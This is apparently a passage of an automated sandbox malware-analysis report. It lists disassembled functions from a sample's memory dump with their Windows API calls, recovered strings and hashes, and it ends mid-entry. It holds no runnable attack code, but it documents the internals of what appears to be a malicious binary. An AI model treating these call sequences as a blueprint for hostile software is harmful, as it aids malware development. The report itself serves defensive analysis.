                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 1743e421b660dcb7d10562a40101a96802dacd54a789d457401728679087c572
                                    • Instruction ID: 9edb490bf84ddecaf29094d98156a2b98dc76bcebb446c2d8d2f5be66d0168f4
                                    • Opcode Fuzzy Hash: 1743e421b660dcb7d10562a40101a96802dacd54a789d457401728679087c572
                                    • Instruction Fuzzy Hash: 0541F7715047DCAEDF318B258C84FFB7BE8EB46304F1444E8EAD6C6042E2B19A458F20
                                    Function 008C89B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA205
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA22B
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C89FD
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: d904d9717ceadf16ffedc5736514262c9e8527c8570a3fe6380f7f0434e82a0a
                                    • Instruction ID: 1a312cb055314364404a7d4f04c4cf77b831641b81ee47f2f5bb7bcfc6c2728f
                                    • Opcode Fuzzy Hash: d904d9717ceadf16ffedc5736514262c9e8527c8570a3fe6380f7f0434e82a0a
                                    • Instruction Fuzzy Hash: 62219472340664DBC7219A6CE840F6AF7B9FBA1761B20092FF152CB651DF71DC4183AA
                                    Function 008C8880 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C88B3
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 11d19f42baa333abdf641e8abe3a3240ccc252acc2dda85721d5246c164cf7ef
                                    • Instruction ID: 1de3936ba86a1ce148b5b1e5efbf41aef9d0870872f82f94000c3e512301e2a4
                                    • Opcode Fuzzy Hash: 11d19f42baa333abdf641e8abe3a3240ccc252acc2dda85721d5246c164cf7ef
                                    • Instruction Fuzzy Hash: 413186B5E005199BCB08DF58C891BADBBB6FB88310F148269E915EB344DB30E901CB91
                                    Function 008E5930 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5942
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5955
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: 8d50b81ab431076e8fddef9414358913b8db48bd237df14440d76572e96b37f6
                                    • Instruction ID: 0fc529c6990bf7df02938b629aeaee5a2df33a4d3ca401de3d85c5c5f5957c29
                                    • Opcode Fuzzy Hash: 8d50b81ab431076e8fddef9414358913b8db48bd237df14440d76572e96b37f6
                                    • Instruction Fuzzy Hash: 99117031304B84CBD7219B2DF800B597BE1FBD2B24F240A5DE1A1CB786DB61D84187A5
                                    Function 008E3C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,008EA460,000000FF), ref: 008E3CC0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E3CC7
                                    • wsprintfA.USER32 ref: 008E3CD7
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 60c3b0d9fa0102de440fcecadf497beccb46703ea44f2b09999e3800524c911b
                                    • Instruction ID: b00f93f73dcfa0161c8a7586db2e92b6b2c10183e410ce58a20b489f6b090037
                                    • Opcode Fuzzy Hash: 60c3b0d9fa0102de440fcecadf497beccb46703ea44f2b09999e3800524c911b
                                    • Instruction Fuzzy Hash: F0010072640244BFE7209BD5DC0AF7BBBA8FB46B61F000114FA01D72D0CBB81801CAA5
                                    Function 008C8740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008C8767
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 76aaeef3d1c5d2758f9141dfb0ec764875480b5cc60282fe895dc8552576b622
                                    • Instruction ID: 6922485b36e817f5e13690a243d311881d17e404d8f0c835d9e25d8dee1ad9a6
                                    • Opcode Fuzzy Hash: 76aaeef3d1c5d2758f9141dfb0ec764875480b5cc60282fe895dc8552576b622
                                    • Instruction Fuzzy Hash: 15F09027B900359B8314A43E8D8499EA966F6E539033AD729E916EF348EC30EC8281D1
                                    Function 008DE640 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DE68B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE6C0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE6CC
                                    • lstrcat.KERNEL32(?,0053D710), ref: 008DE6E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 1a2af593530dcaf917f8932dc8fe0685142029c202dfa82282fe29b27a03fa62
                                    • Instruction ID: 493aa1beec78b15cfcee29e289fe939963c14c04508af49eaa8979dc420a749d
                                    • Opcode Fuzzy Hash: 1a2af593530dcaf917f8932dc8fe0685142029c202dfa82282fe29b27a03fa62
                                    • Instruction Fuzzy Hash: 9C517D71200204AFD754EBA8D846FBE77B9FB84350F40892DB955C7392DE34E91ACB92
                                    Function 008E1F50 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 008E1F5F, 008E1F75, 008E2037
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 2dcb5718259c636d01a124bc3db48be67cf2cdc91f3817d047b7511e7d8610b3
                                    • Instruction ID: 0e9b8859afbf3c03fa6d03a337f51d3d134b0f9f32faec16b6f59e8985f6d305
                                    • Opcode Fuzzy Hash: 2dcb5718259c636d01a124bc3db48be67cf2cdc91f3817d047b7511e7d8610b3
                                    • Instruction Fuzzy Hash: AC2199399106CC8ACB20EB77C4587ECF7ABFF86365F844056C918CB282E335090AD795
                                    Function 008E44A0 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 008E44B2
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 008E44CD
                                    • CloseHandle.KERNEL32(00000000), ref: 008E44D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E4507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: e1e46c3fa22c1cfe39d62d56285d6710e2df33a77b1a694872fbe6743a6266ae
                                    • Instruction ID: c6a25389676497485e8a5fa509834bb59e63b9d4ee9bbf787c28462bf874cce5
                                    • Opcode Fuzzy Hash: e1e46c3fa22c1cfe39d62d56285d6710e2df33a77b1a694872fbe6743a6266ae
                                    • Instruction Fuzzy Hash: E2F0F6B09022556FE721EBF59C49BF6BAA8FF16704F0041A1FA89D61C0DBB08C85C794
                                    Function 008E9001 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 008E900D
                                      • Part of subcall function 008E882F: __amsg_exit.LIBCMT ref: 008E883F
                                    • __getptd.LIBCMT ref: 008E9024
                                    • __amsg_exit.LIBCMT ref: 008E9032
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 008E9056
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: fe0ecb552ddce55f67d18402af6e1faf7a8cf7d1ef4b6a0291cc2977c9af9d29
                                    • Instruction ID: 01d31ea8b2dd80b413181b54f86922c0e015af27838177fe388db6c223cca6eb
                                    • Opcode Fuzzy Hash: fe0ecb552ddce55f67d18402af6e1faf7a8cf7d1ef4b6a0291cc2977c9af9d29
                                    • Instruction Fuzzy Hash: 71F09632908BA0DAEB60B77E5807B5D33A0FF02721F510159F444E62D2CFA85D00D657
                                    Function 008E7340 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(------,008C5B1B), ref: 008E734B
                                    • lstrcpy.KERNEL32(00000000), ref: 008E736F
                                    • lstrcat.KERNEL32(?,------), ref: 008E7379
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: a46d9ca17eb19bf4476e5ed91f088d93d1c5f105dc1610da41bcc3e37db9d2a8
                                    • Instruction ID: d543fb7267e51e4ad22036e34c80a9b44b930f3ff7c1859a2db553adb866b368
                                    • Opcode Fuzzy Hash: a46d9ca17eb19bf4476e5ed91f088d93d1c5f105dc1610da41bcc3e37db9d2a8
                                    • Instruction Fuzzy Hash: D7F0C9789017429FDB649FB6D848A27BAF9FF95705314882DAC9AC7324EB34D842CB50
                                    Function 008D3770 Relevance: 5.5, APIs: 4, Instructions: 490stringCOMMON
                                    Download Yara Rule
                                    APIs
